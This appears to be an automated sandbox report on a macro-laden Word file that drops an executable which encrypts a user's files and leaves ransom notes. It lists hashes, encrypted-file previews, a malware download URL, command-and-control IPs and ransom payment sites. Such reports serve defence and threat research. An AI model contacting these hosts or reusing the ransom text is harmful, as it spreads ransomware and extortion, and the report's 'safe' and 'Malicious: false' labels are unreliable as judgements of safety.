C:\Users\user\Downloads\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Favorites\Amazon.url Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	792
Entropy (8bit):	7.694987190116679
Encrypted:	false
MD5:	5C1FDC9F7496747F8741462768C84D5D
SHA1:	79A5C3578692193061A5EE1C728F95EC0FB256AE
SHA-256:	81437FD1CACD8DBF7BB4BA36B26E3EBEC1E28CE23F49C3CC048CA72629D57C0A
SHA-512:	AF5FD0EC62BF2D403483A21B4A38570E7C3D5BD1333568D50B77E8D45952C8BDA37BC334FBA378D0A5F0489CC2CD219ADBE881B14492A408E4C6C52AB1FE32D1
Malicious:	false
Preview:	.a/.k..?...uD..O..W.{`..CW..=q.H. .E.u[.'.i.jDe.I.N.....w[?u%K'....7..x.)............+....K.$..F...O.&.&....d...j..."_..%.Q.!.G...E...<.5.@a:...q.G.R.Y!XDKe.v8...S.8:......H.:...Rk....4.j..+.....[Zg8G..kA.b{N....H..R.%..#vJ.d.e..K......Vo.bw.c...?....f.af.")D.D-.O.V.QBk...N.G.."6.......>at...qj._.o.L.iB%{L...~....oa..!h.N.(>.L.......8.........<.=.....5...":..]L$.%C...x.;w.2+.Dz.O&.k..F..htv.....U.U~.....-.-.]..@./.d...=9.u,.i....5.UY2...I....).I.. E..T&..vG.....0`..Q...I.H.#e..p.z....-....."....f.af(..%6h.Mp....'..@..K..e.9.Kk...l.bzM%._.Qv.;...;].j.....l^A.!...6...#..:)O!.x.E-.&.'.7...u._.*hi.o.........!..9..&..q.._i.%..1..o...[l.........w0V.....=....}.u4.u.~....v..~.l...U....{.0._+...f[R.@..i.G.Qd...;1M&....p...c....;....!:>(...W..@.Q4....f.af

C:\Users\user\Favorites\Links for United States\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Favorites\Links for United States\GobiernoUSA.gov.url Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2112
Entropy (8bit):	7.880448192661629
Encrypted:	false
MD5:	D597694CF6D3FBB2D096213BED330051
SHA1:	2C230D8977C5D16A7BEC7FBA2E41781A4A838071
SHA-256:	EABED2E3AB79C96756B847C8041E60165C035A9F2AB7CD583A50BEEB5285F3AC
SHA-512:	707A6D3028AA370B7442A9FD1A7BB4A30517650BBBA6390482767EEC40F18F886C6623D0DCF0D2A73495A63CB9689CCF5961787F4D6B8C21C0C6A3EB1D6ADE76
Malicious:	false
Preview:	l..n~...h.....5,.`.X+.....=........k&Vl.........S..M..G.6#.6.2t.{ .2.=.~o...IR.-.Civ......*1i.QE.>.y..f3..&..%...O..E.[i.X".@....8f..L7]P.8Z.69.....lb.........j.(.NBl(q...T.L..W.G..0...W.......q.k..iOP]je.vZi.KR.OH.f}.....r.....N.yYx..F?l.U...u....f.af..b...:..M@.X....j...U....j...8.6Y.~...AUx.y....U_".p..0.8...B...7.U....zQ\r5...........A'..k.........\c.......if\|. ;.....}d".KQ..W.....s.U..75...=...9.fr.......N.J.g.2..$3..r+......7y.i@.@%..I..N.@....#...)`J..@..[..0g..:...."...^.w..5......f.af`..7{...N..~En...(1...9.P`....f}....#. .....g...~.d..;:N1.,#RT+\|d.C.^.S..u...h....Z..'..)8...S...Em..%..Y.U...f+}B.y6.V.l....-3a.B.$.....UJ...}8....SR.;.%nw......2\|B..<..j.1..p.d-i..+.....+W..T...A.,U..].i...k3...\|.r..w9.3Q..CW.!U.>P.\|.9.d.]O(.f..0.....f.afeG.1Nb.n.hQ=...E.).EG.q.........SF&.N....L..o.Q..o........!.+..l.\:.l..T.z...9......e.O.[...........7bF.....Q.)...v.L...rAc0?.=y....b.bQ-a...<.P3mw..F.y5.....nZ..p.Y........X.\|......?...g~....s.E...

C:\Users\user\Favorites\Links\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Favorites\Links\Suggested Sites.url Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.5696408972450895
Encrypted:	false
MD5:	F123520C8817EAD5E4061F81A2158B00
SHA1:	03FF4C30718E7E0D6A2AB33F64F22510A56C3A00
SHA-256:	761E2F60461638A1C89440870E8D8405C43A782BE148AF3801DAD06A60709600
SHA-512:	F684554E03291DD0BDFB59638BEA0AB66FAA862136F20CF9C8C02DF9B41AC8B73124E3F119CB64797BB9969C5D852E88DEA9EE7595EB8BFCA3E486F8AC0C4A6F
Malicious:	false
Preview:	.U..3(s...C{$.X.Ir.?....I...Y.....?..h. :.K..ox:.Pd4Gi.., ...C....D. .y....1$.e..W&iU..Y.aM....m..,...Q....c..`..\.O)!.Z... .>...W..-.[...=.Y.r.BW.1:."M.O...T..'.7..`lB'...A... .^{?aJ..N...<.!2;.)..X...Z..Q..........W.."........b.#......9...c..4W....f.af..F.d......i6.......GN...J...9).qkzf_.x(.~..}.N...x&.M...,@.F...F#.c....!X.....]..,G..\.d..S..e].....$...=./.....jB.!.gA..,.m..(d.....3.e...6m..CZ..,.^U3CZ..(>.....L.IF\|gw..{....G..S.#..(..@..........e..o...z.K.I%..9....>.>...a.p<..v..#.4...>....f.af

C:\Users\user\Links\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Music\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Recent\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Searches\Everywhere.search-ms Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.571901530728203
Encrypted:	false
MD5:	63250090FBF3E9CA1E2ACAF22DC9BFD4
SHA1:	D5F42E390BE67958A7A6F8C7C2D3DDD1C843EC4C
SHA-256:	441BC40489C1BDFEB83B2337237F0C128DA106262CD13E3486EB40D56B0237EA
SHA-512:	89DBBB92941F9133E9AEF4DE125A5C78E8CB41AAFDD6923EFCEB3F4EA9BAD908C0E78A37A105586E1BB05042CCC576C8CA60D6D98B567AAB2E210E6CB9A53F2D
Malicious:	false
Preview:	..P/B....X.h...p.....w/.Ng.....0D.....Tt@.._.~....+..U)....:sV.bR...B.T.. ..z.!.#.E..UB....Pb..U.....%..`r...$jB..m......[.s..o..].:.........j....3d..;.CP4K2$.!%.....U.....x.`..W..3.Ky...Y%$~H.=9.~......yq.\|.k.\V@...........DU.R.z...3.N..B...k......f.afB......{.JFI.-.dtF.Br#...E.M..^........Z.z~r.....!....bsA.. ...9$.b....U....@..ua.9Cu......9.A.>.{n...'B...a.Q..yu.`Xim..8...m...$.>C.G....eb..Y.g......u......\.Q.....4hs..J.\|B$..1./_a."<.....I.Q>n.5.a~.....X].S61.+E.! ....0.a.8y/^.t@.6...X.....f.af

C:\Users\user\ntuser.ini Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.106412774448416
Encrypted:	false
MD5:	6E8AF670415C356AAE97BD073C663695
SHA1:	0FE472BCB0A95FBA993A8CAEB092C4B7699DBB9D
SHA-256:	77BCFE1D866D02452CA7720DFE4608468437A67B045A5D94B0B088EFB0D267E2
SHA-512:	977DCD9123BD4A864D57BC184914B2F23D77820E8DBFDF500146A85262E5147878599215B59806487B6901C02FDC60BDB5B6223C96D121668AD510E69564DEC7
Malicious:	false
Preview:	...j........@....JJ...4v...&.r.[.p..ru..W).N....4L..,p..#l...'....a._.g..m..h..5...E...IE.........H~....kg.dG=.....*.6.F...c.:..,...X.B..?....7....?sG_..v.r[.0.?.{6(..occ0L{.>. .......?("..j-..;aU..Xk)4..Q=.......s...,.OD....f.&w.~eG.(PE.$.....f.af

C:\Windows\Temp\wupd12.14.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	724480
Entropy (8bit):	5.829477474491446
Encrypted:	false
MD5:	0F841C6332C89EAA7CAC14C9D5B1D35B
SHA1:	23ACD12DD10615C5F0604E842D755A0EE3F4B42E
SHA-256:	806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627
SHA-512:	F6C65CA0D9337C6E98B25862262378583F04B665883866C5A3AE3F60E53BADA96C027CF0F7406E705E50B4C831C5C6635327518B377850F080284CE1E418DDF8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 5%, Browse
Joe Sandbox View:	Filename: VERDI (002).doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t.].....................~....................@..........................P......r........................................ ..P.......,w..................................................................@...H.......,............................text...R\|.......~.................. ..`.data...@................................rsrc...............................`...........E....0...................... ...........V....@...................... .....U ....:U-......H:...........kernel32.dll.comctl32.dll.GdiPlus.dll...................................................................................................................................................................................................................................................................................................................................................................

C:\autoexec.bat Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.148399447080707
Encrypted:	false
MD5:	7B7D2C666D33854A040D6AD9F28ED563
SHA1:	8879596450DE024953D4F621F0912E253F3479F9
SHA-256:	CC847B626C3C3A20C708C9F92357207C310E42FF064EDE544C680CEFE1AC899A
SHA-512:	73F4C5AA0407E94464F2D652B7F565CCF9512C2730EF40C265088CF91645514DB77C4B05F0A873631D4A601A9CA5943036297C23546336E87A6551BA5DF07F8F
Malicious:	false
Preview:	......=..p/...l...........y..D..s,..yY..j1.}.._.C{........Az.p.q..t4.h{....../....G.~a@.....i>.9F..[.<.mL.rqB.......@a.\.......!. ./.syc...O.g#...w. .W....G...P..J..{q..%...}%...5..{}.....h.)z'(..J.v.I.'.....x...,~...'*v.~^..&..p.%..![....f.af

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.218.114.37/edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k	false	Avira URL Cloud: safe	unknown
http://91.218.114.26/weu.html?n=641&uy=33vt2	false	Avira URL Cloud: safe	unknown
http://91.218.114.26/post/yocs.jspx?mh=gvs58	false	Avira URL Cloud: safe	unknown
http://91.218.114.4/signout/login/ct.html	false	Avira URL Cloud: safe	unknown
http://91.218.114.32/checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215	false	Avira URL Cloud: safe	unknown
http://91.218.114.11/view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x	false	Avira URL Cloud: safe	unknown
http://91.218.114.38/edit/signout/r.html	false	Avira URL Cloud: safe	unknown
http://104.168.198.208/wordupd.tmp	false	Avira URL Cloud: malware	unknown
http://91.218.114.4/payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4	false	Avira URL Cloud: safe	unknown
http://91.218.114.11/forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6	false	Avira URL Cloud: safe	unknown
http://91.218.114.25/tracker/lpvotht.php?ij=74lh01y&if=3h00sur	false	Avira URL Cloud: safe	unknown
http://91.218.114.25/frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.	WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://91.218.114.31/update/cwmgplanv.jspx?pnv=u&qraq=41g187&g=xu401v60	wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://91.218.114.38/edit/signout/r.htmllAez	wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://104.168.198.208/wordupd.tmple	WINWORD.EXE, 00000000.00000002.329471285.048B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://91.218.114.31/kwa.html?hkex=p77mwf5h44&spi=3ylt07ucfg	wupd12.14.tmp, 00000005.00000002.596422643.019F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aoacugmutagkwctu.onion/%USERID%	wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.torproject.org/	wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	false		high
http://ns.ad	WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://aoacugmutagkwctu.onion/5e4c085c3c4e0000	wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://ns.adbe.	WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://mazedecrypt.top/5e4c085c3c4e0000	wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://104.168.198.208/wordupd.tmpqqC:	WINWORD.EXE, 00000000.00000002.322542209.00412000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mazedecrypt.top/%USERID%	wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
91.218.114.38	Russian Federation	49335	unknown	false
91.218.114.26	Russian Federation	49335	unknown	false
91.218.114.37	Russian Federation	49335	unknown	false
91.218.114.25	Russian Federation	49335	unknown	false
104.168.198.208	United States	54290	unknown	false
91.218.114.11	Russian Federation	49335	unknown	false
91.218.114.32	Russian Federation	49335	unknown	false
91.218.114.4	Russian Federation	49335	unknown	false
91.218.114.31	Russian Federation	49335	unknown	false

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.684061596725524
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 35.99% Word Microsoft Office Open XML Format document (43504/1) 30.10% Word Microsoft Office Open XML Format document (41004/1) 28.37% ZIP compressed archive (8000/1) 5.54%
File name:	Verdi.doc
File size:	130878
MD5:	ad30987a53b1b0264d806805ce1a2561
SHA1:	e7da9cac8fc6a30c2879ddb1ab97422e59979591
SHA256:	9f2139cc7c3fad7f133c26015ed3310981de26d7f1481355806f430f9c97e639
SHA512:	b1d1607bbf966c873397e5155e016c94641733a6b659fdb621f0ce0446b847821eb52ab73b3edad5938674e71ac79239ac14b6a125dc04193f9bc27a2c39ca8b
SSDEEP:	3072:Gv8HvQSyp02Xm2qU9Zu3r6Db5b9y4/n4Ho:fbVV499y4v9
